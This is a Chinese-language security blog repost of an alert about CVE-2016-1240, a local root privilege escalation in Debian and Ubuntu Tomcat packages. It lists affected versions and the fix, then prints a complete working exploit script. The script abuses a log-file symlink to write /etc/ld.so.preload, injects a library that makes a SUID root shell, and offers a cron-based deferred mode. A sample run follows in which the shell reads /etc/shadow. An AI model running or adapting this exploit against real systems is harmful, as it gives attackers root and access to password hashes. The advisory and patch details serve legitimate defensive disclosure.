漏洞预警:Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)

摘要

Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。





漏洞预警:Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)


漏洞预警:Tomcat曝本地提权漏洞 (CVE-2016-1240 附PoC)

笔者QQ:381493251
博客地址:www.abcdocker.com
微信公众号:abcdocker
Abcdocker交流群:454666672
如果遇到什么问题可以进群询问,我们是一个乐于帮助的集体!

  Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。
  Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。
14758465183165.png!small.jpg-107.8kB
漏洞编号:

CVE-2016-1240

影响范围:

  1. Tomcat 8 <= 8.0.36-2
  2. Tomcat 7 <= 7.0.70-2
  3. Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

受影响的系统包括DebianUbuntu,其他使用相应deb包的系统也可能受到影响。

修复方案:
Debian安全团队已经修复了受影响的包;更新至系统提供的最新版Tomcat包即可。

漏洞概述:
  Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-1240这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本:/etc/init.d/tocat* 利用该脚本,可导致攻击者通过低权限的Tomcat用户获得系统root权限!

  1. # Run the catalina.sh script as a daemon
  2. set +e
  3. touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
  4. chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

本地攻击者,作为tomcat用户(比如说,通过web应用的漏洞)若将catalina.out修改为指向任意系统文件的链接,一旦Tomcat init脚本(ROOT权限运行)在服务重启后再次打开catalina.out文件,攻击者就可获取ROOT权限。

漏洞PoC:

  1. #!/bin/bash
  2. #
  3. # Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
  4. #
  5. # CVE-2016-1240
  6. #
  7. # Discovered and coded by:
  8. #
  9. # Dawid Golunski
  10. # http://legalhackers.com
  11. #
  12. # This exploit targets Tomcat (versions 6, 7 and 8) packaging on
  13. # Debian-based distros including Debian, Ubuntu etc.
  14. # It allows attackers with a tomcat shell (e.g. obtained remotely through a
  15. # vulnerable java webapp, or locally via weak permissions on webapps in the
  16. # Tomcat webroot directories etc.) to escalate their privileges to root.
  17. #
  18. # Usage:
  19. # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
  20. #
  21. # The exploit can used in two ways:
  22. #
  23. # -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
  24. # gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
  25. # It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
  26. # a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
  27. #
  28. # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
  29. # /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
  30. # Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
  31. # Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
  32. # then add arbitrary commands to the file which will be executed with root privileges by
  33. # the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
  34. # Ubuntu/Debian Tomcat installations).
  35. #
  36. # See full advisory for details at:
  37. # http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
  38. #
  39. # Disclaimer:
  40. # For testing purposes only. Do no harm.
  41. #
  42. BACKDOORSH="/bin/bash"
  43. BACKDOORPATH="/tmp/tomcatrootsh"
  44. PRIVESCLIB="/tmp/privesclib.so"
  45. PRIVESCSRC="/tmp/privesclib.c"
  46. SUIDBIN="/usr/bin/sudo"
  47. function cleanexit {
  48. # Cleanup
  49. echo -e "\n[+] Cleaning up..."
  50. rm -f $PRIVESCSRC
  51. rm -f $PRIVESCLIB
  52. rm -f $TOMCATLOG
  53. touch $TOMCATLOG
  54. if [ -f /etc/ld.so.preload ]; then
  55. echo -n > /etc/ld.so.preload 2>/dev/null
  56. fi
  57. echo -e "\n[+] Job done. Exiting with code $1 \n"
  58. exit $1
  59. }
  60. function ctrl_c() {
  61. echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
  62. cleanexit 0
  63. }
  64. #intro
  65. echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
  66. echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
  67. # Args
  68. if [ $# -lt 1 ]; then
  69. echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
  70. exit 3
  71. fi
  72. if [ "$2" = "-deferred" ]; then
  73. mode="deferred"
  74. else
  75. mode="active"
  76. fi
  77. # Priv check
  78. echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
  79. id | grep -q tomcat
  80. if [ $? -ne 0 ]; then
  81. echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
  82. exit 3
  83. fi
  84. # Set target paths
  85. TOMCATLOG="$1"
  86. if [ ! -f $TOMCATLOG ]; then
  87. echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
  88. exit 3
  89. fi
  90. echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"
  91. # [ Deferred exploitation ]
  92. # Symlink the log file to /etc/default/locale file which gets executed daily on default
  93. # tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
  94. # Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
  95. # restarted and file owner gets changed.
  96. if [ "$mode" = "deferred" ]; then
  97. rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
  98. if [ $? -ne 0 ]; then
  99. echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
  100. cleanexit 3
  101. fi
  102. echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
  103. echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
  104. echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
  105. echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges"
  106. echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)
  107. \n\n"
  108. exit 0
  109. fi
  110. # [ Active exploitation ]
  111. trap ctrl_c INT
  112. # Compile privesc preload library
  113. echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
  114. cat <<_solibeof_>$PRIVESCSRC
  115. #define _GNU_SOURCE
  116. #include <stdio.h>
  117. #include <sys/stat.h>
  118. #include <unistd.h>
  119. #include <dlfcn.h>
  120. uid_t geteuid(void) {
  121. static uid_t (*old_geteuid)();
  122. old_geteuid = dlsym(RTLD_NEXT, "geteuid");
  123. if ( old_geteuid() == 0 ) {
  124. chown("$BACKDOORPATH", 0, 0);
  125. chmod("$BACKDOORPATH", 04777);
  126. unlink("/etc/ld.so.preload");
  127. }
  128. return old_geteuid();
  129. }
  130. _solibeof_
  131. gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
  132. if [ $? -ne 0 ]; then
  133. echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
  134. cleanexit 2;
  135. fi
  136. # Prepare backdoor shell
  137. cp $BACKDOORSH $BACKDOORPATH
  138. echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
  139. # Safety check
  140. if [ -f /etc/ld.so.preload ]; then
  141. echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
  142. cleanexit 2
  143. fi
  144. # Symlink the log file to ld.so.preload
  145. rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
  146. if [ $? -ne 0 ]; then
  147. echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
  148. cleanexit 3
  149. fi
  150. echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
  151. # Wait for Tomcat to re-open the logs
  152. echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
  153. echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
  154. "
  155. while :; do
  156. sleep 0.1
  157. if [ -f /etc/ld.so.preload ]; then
  158. echo $PRIVESCLIB > /etc/ld.so.preload
  159. break;
  160. fi
  161. done
  162. # /etc/ld.so.preload file should be owned by tomcat user at this point
  163. # Inject the privesc.so shared library to escalate privileges
  164. echo $PRIVESCLIB > /etc/ld.so.preload
  165. echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
  166. echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
  167. echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
  168. # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
  169. echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
  170. sudo --help 2>/dev/null >/dev/null
  171. # Check for the rootshell
  172. ls -l $BACKDOORPATH | grep rws | grep -q root
  173. if [ $? -eq 0 ]; then
  174. echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
  175. echo -e "\n\033[94mPlease tell me you're seeing this too ;)
  176. \033[0m"
  177. else
  178. echo -e "\n[!] Failed to get root"
  179. cleanexit 2
  180. fi
  181. # Execute the rootshell
  182. echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
  183. $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
  184. $BACKDOORPATH -p
  185. # Job done.
  186. cleanexit 0

Poc运行示例:

  1. tomcat7@ubuntu:/tmp$ id
  2. uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
  3. tomcat7@ubuntu:/tmp$ lsb_release -a
  4. No LSB modules are available.
  5. Distributor ID: Ubuntu
  6. Description: Ubuntu 16.04 LTS
  7. Release: 16.04
  8. Codename: xenial
  9. tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
  10. ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries
  11. ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
  12. ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files
  13. tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out
  14. Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
  15. CVE-2016-1240
  16. Discovered and coded by:
  17. Dawid Golunski
  18. http://legalhackers.com
  19. [+] Starting the exploit in [active] mode with the following privileges:
  20. uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
  21. [+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
  22. [+] Compiling the privesc shared library (/tmp/privesclib.c)
  23. [+] Backdoor/low-priv shell installed at:
  24. -rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
  25. [+] Symlink created at:
  26. lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
  27. [+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
  28. You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
  29. [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
  30. -rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
  31. [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
  32. [+] The /etc/ld.so.preload file now contains:
  33. /tmp/privesclib.so
  34. [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
  35. [+] Rootshell got assigned root SUID perms at:
  36. -rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
  37. Please tell me you're seeing this too ;)
  38. [+] Executing the rootshell /tmp/tomcatrootsh now!
  39. tomcatrootsh-4.3# id
  40. uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
  41. tomcatrootsh-4.3# whoami
  42. root
  43. tomcatrootsh-4.3# head -n3 /etc/shadow
  44. root:$6$oaf[cut]:16912:0:99999:7:::
  45. daemon:*:16912:0:99999:7:::
  46. bin:*:16912:0:99999:7:::
  47. tomcatrootsh-4.3# exit
  48. exit

*编译:漏洞盒子安全团队,消息来源:Twitter,转载请注明来自FreeBuf.COM
原文:http://www.freebuf.com/vuls/115862.html?spm=5176.2020520154.sas.14.Ha4Thk
     weixin.gif-425.6kB


新闻联播老司机

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: